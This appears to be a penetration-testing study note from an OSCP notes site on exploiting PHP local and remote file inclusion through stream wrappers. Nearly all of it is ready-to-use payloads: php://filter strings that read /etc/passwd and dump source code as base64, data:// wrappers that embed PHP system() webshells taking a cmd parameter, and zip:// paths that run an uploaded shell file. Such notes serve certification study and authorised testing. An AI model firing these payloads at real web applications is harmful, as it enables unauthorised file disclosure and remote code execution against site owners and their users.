// notes/ Web Exploitation
🕸️

LFI And RFI Php Wrappers

Notes from oscp.adot8.com — web applications.

#web applications#adot8
source · oscp.adot8.com · web-applications/lfi-and-rfi_php-wrappers

PHP Wrappers

code
01php://filter/resource=/etc/passwd
02php://filter/resource=index.php
03php://filter/convert.base64-encode/resource=index.php
04php://filter/convert.base64-encode/resource=index
05php://filter/read=string.rot13/resource=index.php

{% hint style="warning" %} Its important to try with and without the extension {% endhint %}

code
01data://text/plain,<?php echo system('whoami');?>"
code
01echo -n '<?php echo system($_GET["cmd"]);?>' | base64
02data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=whoami

{% embed url="https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/?source=post_page-----b49a52ed8e38--------------------------------" %}

{% embed url="https://offsecpg.adot8.com/proving-grounds/proving-grounds-practice/linux/zipper/foothold" %}

{% hint style="info" %} If you have the ability to upload zip files, the zip:// will unzip and read/execute the file in the zip file {% endhint %}

code
01zip:///var/www/html/uploads/shell.zip%23shell.php
02zip:///var/www/html/uploads/upload_1725881785.zip%23cmd.php&cmd=id
03zip:///var/www/html/uploads/upload_1725881785.zip%23cmd&cmd=id